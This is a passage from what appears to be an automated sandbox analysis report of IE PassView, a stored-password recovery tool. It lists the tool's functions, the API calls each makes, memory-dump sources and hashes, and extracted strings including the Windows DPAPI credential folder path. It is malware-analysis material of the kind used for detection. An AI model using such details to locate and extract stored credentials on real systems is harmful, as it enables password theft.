                                        • GetDlgItem.USER32(?,000003E9), ref: 00405138
                                        • EndDialog.USER32(?,00000002), ref: 00405154
                                        • EndDialog.USER32(?,00000001), ref: 00405167
                                          • Part of subcall function 00404E01: GetDlgItem.USER32(?,000003E9), ref: 00404E0F
                                          • Part of subcall function 00404E01: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00404E24
                                          • Part of subcall function 00404E01: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00404E40
                                        • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040517F
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 0040528B
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Item$DialogMessageSend
                                        • String ID:
                                        • API String ID: 2485852401-0
                                        • Opcode ID: 9e37208e1ac624ff015cc8e23fc7f15464607b37513521ea11ea388b8c8f7f62
                                        • Instruction ID: 772c1af3226cbc80ad889adf0027262ed51c140b767d915fdd2215fad93927ef
                                        • Opcode Fuzzy Hash: 9e37208e1ac624ff015cc8e23fc7f15464607b37513521ea11ea388b8c8f7f62
                                        • Instruction Fuzzy Hash: 8461C730500A05AFDB21AF25C886B2BB7A5FF50724F00C23EF915AA6D1D778A950CF95
                                        Function 0040529B Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 004052AC
                                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 004052C8
                                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004052EF
                                        • memset.MSVCRT ref: 00405300
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 0040532F
                                        • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 0040537C
                                        • SetFocus.USER32(?,?,?,?), ref: 00405385
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00405393
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                        • String ID:
                                        • API String ID: 2313361498-0
                                        • Opcode ID: ffda32b987b975e76c272f98d077908fce1f9b3e3661f9b97b05ec55d3a69eb9
                                        • Instruction ID: fcb6e9a3e2539a50ad56ef20c263cb5018baa505a50de7ca275cb4eb460b5b6e
                                        • Opcode Fuzzy Hash: ffda32b987b975e76c272f98d077908fce1f9b3e3661f9b97b05ec55d3a69eb9
                                        • Instruction Fuzzy Hash: DF3192B2900605AFDB289F69C88592BB7A8FF04354B10853FF559E72E1DB74AC508F98
                                        Function 0040A35E Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetClientRect.USER32(?,?), ref: 0040A37D
                                        • GetWindowRect.USER32(?,?), ref: 0040A393
                                        • GetWindowRect.USER32(?,?), ref: 0040A3A6
                                        • BeginDeferWindowPos.USER32(00000003), ref: 0040A3C3
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A3E0
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A400
                                        • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A427
                                        • EndDeferWindowPos.USER32(?), ref: 0040A430
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: Window$Defer$Rect$BeginClient
                                        • String ID:
                                        • API String ID: 2126104762-0
                                        • Opcode ID: 1854e6fb99ce8c4303dfcbab056374da83491766879c7cec17d9c754172deb83
                                        • Instruction ID: f25a26094e2faca3529be936910622707c98b43269e966daf1f2252f6084e513
                                        • Opcode Fuzzy Hash: 1854e6fb99ce8c4303dfcbab056374da83491766879c7cec17d9c754172deb83
                                        • Instruction Fuzzy Hash: BF21F572900209FFEB118FA9CD89FEEBBB9FB08300F004464F655B21A0C7316A619B24
                                        Function 00404EDA Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00404EF1
                                        • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00404F0A
                                        • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 00404F17
                                        • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00404F23
                                        • memset.MSVCRT ref: 00404F8D
                                        • SendMessageA.USER32(?,00001019,?,?), ref: 00404FBE
                                        • SetFocus.USER32(?), ref: 00405043
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: MessageSend$FocusItemmemset
                                        • String ID:
                                        • API String ID: 4281309102-0
                                        • Opcode ID: 80125f1d81a2cba84744ca6ac5adebaefa6749431186c28d072d8f46a3c5ea3f
                                        • Instruction ID: 58c29ce436bfd17f4f10d94b53620d6b054177c9c1f076ea9b8b40f12dd7b6e3
                                        • Opcode Fuzzy Hash: 80125f1d81a2cba84744ca6ac5adebaefa6749431186c28d072d8f46a3c5ea3f
                                        • Instruction Fuzzy Hash: 0F415AB5D00209AFDB24AF99DC85DAEBBB8EF48344F00406AFA14B7291D7759E50CF94
                                        Function 00408E49 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004054A8: strlen.MSVCRT ref: 004054B5
                                          • Part of subcall function 004054A8: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040918C,?,<item>), ref: 004054C2
                                        • _mbscat.MSVCRT ref: 00408F0E
                                        • sprintf.MSVCRT ref: 00408F30
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileWrite_mbscatsprintfstrlen
                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                        • API String ID: 1631269929-4153097237
                                        • Opcode ID: 06ca42e6ace3ae292070cc0d22cbed44d8adeff900dd6316284e2bd14a4814a1
                                        • Instruction ID: 8ff27bf3e52c1c78db60ebb1db0c82d0b0e4d6300b2fd37b49e12284e27a8134
                                        • Opcode Fuzzy Hash: 06ca42e6ace3ae292070cc0d22cbed44d8adeff900dd6316284e2bd14a4814a1
                                        • Instruction Fuzzy Hash: BB31AF31900208AFDF05DF94C88699E7BB6EF44324F10416AF911BB2D1DB76A955CB84
                                        Function 00407B29 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ItemMenu$CountInfomemsetstrchr
                                        • String ID: 0$6
                                        • API String ID: 2300387033-3849865405
                                        • Opcode ID: f138c0c2e17f0f454b1f933c491c59eafba46a739957d8cab4cfcae500cf8054
                                        • Instruction ID: 61c400f18213051141d08820346c8c71aff278f6f6d7e791ff3ca33551ec7abe
                                        • Opcode Fuzzy Hash: f138c0c2e17f0f454b1f933c491c59eafba46a739957d8cab4cfcae500cf8054
                                        • Instruction Fuzzy Hash: 39219C7180C384ABD7118F55C88199BB7E8FB84348F044A7EF688A6290D779E9548B5B
                                        Function 00405E23 Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 59stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00405E44
                                        • sprintf.MSVCRT ref: 00405E6D
                                        • strlen.MSVCRT ref: 00405E79
                                        • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405E8E
                                        • strlen.MSVCRT ref: 00405E9C
                                        • memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405EAC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$memsetsprintf
                                        • String ID: %s (%s)
                                        • API String ID: 3756086014-1363028141
                                        • Opcode ID: c1b74242e2db3a75d5f9e606b1649bdaee36850ece59ec3017192dee8e4fef9b
                                        • Instruction ID: fafc8e1aca859c60be1a8c8db80c82d2408a10209385ede797be30bf89967f6d
                                        • Opcode Fuzzy Hash: c1b74242e2db3a75d5f9e606b1649bdaee36850ece59ec3017192dee8e4fef9b
                                        • Instruction Fuzzy Hash: B61172B1C00158ABDB11DF98CC45FDABBBCEF41308F4005BAE584B7141D775AA59CBA5
                                        Function 00405B75 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: _mbscat$memsetsprintf
                                        • String ID: %2.2X
                                        • API String ID: 125969286-791839006
                                        • Opcode ID: 15a19572f1feb158bb203c567dcf454c76b0b593cab2cbaff41282a2c2ca6bbc
                                        • Instruction ID: 9537ea820aaad274ba5bec07ccd7337ec1ab5dc8eb8c85604286a1d81751f0f1
                                        • Opcode Fuzzy Hash: 15a19572f1feb158bb203c567dcf454c76b0b593cab2cbaff41282a2c2ca6bbc
                                        • Instruction Fuzzy Hash: BB014C72D042282AD72652568C43BAB37ACEB54714F10407FFC44F51C1EABCF5484B9E
                                        Function 0040B61E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B63F
                                        • RegisterClassA.USER32(?), ref: 0040B664
                                        • GetModuleHandleA.KERNEL32(00000000), ref: 0040B66B
                                        • CreateWindowExA.USER32(00000000,IEPV,IE PassView,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 0040B68D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: HandleModule$ClassCreateRegisterWindow
                                        • String ID: IE PassView$IEPV
                                        • API String ID: 2678498856-1990178490
                                        • Opcode ID: 8591f2bd93bf1a651786be77175e3d47ae507e1c6330b3cc51d66b98adde71b9
                                        • Instruction ID: 842871e813a439d299ab53f127e5dce29ef535e803bb2912a0a8da56c4c3ec7f
                                        • Opcode Fuzzy Hash: 8591f2bd93bf1a651786be77175e3d47ae507e1c6330b3cc51d66b98adde71b9
                                        • Instruction Fuzzy Hash: 3301C8B1901229ABC7119FAA8D85ADFBEB8FF09750F104526F514B2240D7B456508BE9
                                        Function 0040C26A Relevance: 9.1, APIs: 6, Instructions: 142COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040BDFE,00000000,00000000), ref: 0040C2A1
                                        • memset.MSVCRT ref: 0040C2FE
                                        • memset.MSVCRT ref: 0040C310
                                          • Part of subcall function 0040C189: _mbscpy.MSVCRT(?,-00000001), ref: 0040C1AF
                                        • memset.MSVCRT ref: 0040C3F7
                                        • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040C41C
                                        • CloseHandle.KERNEL32(00000000,0040BDFE,?), ref: 0040C466
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 3974772901-0
                                        • Opcode ID: c355bf422d420e09035804cd74dc979f2c32c7a33ae6a0d483b1ed98b9d793fd
                                        • Instruction ID: 792c3efbd14f137ed81f7205850b434bfe261aad0309b67609fb1f2d029afc56
                                        • Opcode Fuzzy Hash: c355bf422d420e09035804cd74dc979f2c32c7a33ae6a0d483b1ed98b9d793fd
                                        • Instruction Fuzzy Hash: 7951FBB1D00218EBDB10DF95CD85AEEB7B8FB44704F1041AAEA05F2291D7749A85CF69
                                        Function 0040A986 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 70COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A9A6
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040755F
                                          • Part of subcall function 00407520: LoadStringA.USER32(00000000,00000006,?,?), ref: 004075F4
                                          • Part of subcall function 00407520: memcpy.MSVCRT(00000000,00000001), ref: 00407633
                                          • Part of subcall function 00407520: _mbscpy.MSVCRT(004121F8,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 0040759D
                                          • Part of subcall function 00407520: strlen.MSVCRT ref: 004075BB
                                          • Part of subcall function 00407520: GetModuleHandleA.KERNEL32(00000000,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,004027DA,IE PassView), ref: 004075C9
                                          • Part of subcall function 00405E23: memset.MSVCRT ref: 00405E44
                                          • Part of subcall function 00405E23: sprintf.MSVCRT ref: 00405E6D
                                          • Part of subcall function 00405E23: strlen.MSVCRT ref: 00405E79
                                          • Part of subcall function 00405E23: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405E8E
                                          • Part of subcall function 00405E23: strlen.MSVCRT ref: 00405E9C
                                          • Part of subcall function 00405E23: memcpy.MSVCRT(00000001,?,00000001,?,00000000,00000000,00000001,00000000,00000000,%s (%s),?,?), ref: 00405EAC
                                          • Part of subcall function 00405C08: _mbscpy.MSVCRT(?,?), ref: 00405C6E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: memcpystrlen$HandleModule_mbscpymemset$LoadStringsprintf
                                        • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                        • API String ID: 1772356520-3614832568
                                        • Opcode ID: 184eca543d16e74b976b6ba8e879fce1a7ae83d7c879644b6dfcb39dcd56c2f2
                                        • Instruction ID: 8257111a09e3bf2c7ab3f6a09a3cfb4e3eaf558a703c3f4761269093adef0cb8
                                        • Opcode Fuzzy Hash: 184eca543d16e74b976b6ba8e879fce1a7ae83d7c879644b6dfcb39dcd56c2f2
                                        • Instruction Fuzzy Hash: 4821E0B1C05219AFDB00EF95D9817DEBBB4FB08304F10517BE61DB62C1E7385A468B9A
                                        Function 004033B4 Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 61stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • strlen.MSVCRT ref: 004033D2
                                        • strlen.MSVCRT ref: 004033DF
                                        • strlen.MSVCRT ref: 0040340F
                                        • strlen.MSVCRT ref: 0040341D
                                          • Part of subcall function 00405918: _mbscpy.MSVCRT(?,?,?,00403438,?,Application Data\Microsoft\Protect,?,?,?,00000000,00402C40,?), ref: 00405920
                                          • Part of subcall function 00405918: _mbscat.MSVCRT ref: 0040592F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: strlen$_mbscat_mbscpy
                                        • String ID: AppData\Roaming\Microsoft\Protect$Application Data\Microsoft\Protect
                                        • API String ID: 2369969472-36309976
                                        • Opcode ID: 41aeda7f39aadca49428ce4293023686735247b1bdd4b8e0e915cf2e89f9afbb
                                        • Instruction ID: 6e4e29caf338ae44f47f5ffcd363a1e3ba5aae136a0af6f395b1f13a557af891
                                        • Opcode Fuzzy Hash: 41aeda7f39aadca49428ce4293023686735247b1bdd4b8e0e915cf2e89f9afbb
                                        • Instruction Fuzzy Hash: 8F0126326082049EC3117A566C41BAAABDCCF8231AF60487FF500FB1C3EE7D6A46426D
                                        Function 004022A6 Relevance: 9.1, APIs: 6, Instructions: 56filestringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004022CB
                                        • memset.MSVCRT ref: 004022E4
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 004022FB
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 0040231A
                                        • strlen.MSVCRT ref: 0040232C
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040233D
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidememset$FileWritestrlen
                                        • String ID:
                                        • API String ID: 1786725549-0
                                        • Opcode ID: f1480f6260a2f907db4ea2b3d77c67a81c1faef3ce8f777ed2f65290efc94493
                                        • Instruction ID: 9103f75693024a9fa63d67926c53f888b6e91365cee00ad0ed946c1c94462a69
                                        • Opcode Fuzzy Hash: f1480f6260a2f907db4ea2b3d77c67a81c1faef3ce8f777ed2f65290efc94493
                                        • Instruction Fuzzy Hash: CF115BB280022CBEFB01AB958D89DEB73ACDB04354F0001B6BB19E2191D6749F548B79
                                        Function 0040ABB5 Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathA.KERNEL32(00000104,?), ref: 0040ABCF
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040ABE1
                                        • GetTempFileNameA.KERNEL32(?,0040EF2C,00000000,?), ref: 0040AC03
                                        • OpenClipboard.USER32(?), ref: 0040AC23
                                        • GetLastError.KERNEL32 ref: 0040AC3C
                                        • DeleteFileA.KERNEL32(00000000), ref: 0040AC59
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1765185281.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 0000000D.00000002.1765158183.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000411000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000413000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765185281.0000000000417000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765319247.0000000000418000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                        • Associated: 0000000D.00000002.1765350773.000000000041A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_400000_iepv.jbxd
                                        Similarity
                                        • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                        • String ID:
                                        • API String ID: 2014771361-0
                                        • Opcode ID: 75d2357909d40158cc69edc1db622911d699251443c9bce1769a0f969478b0a7
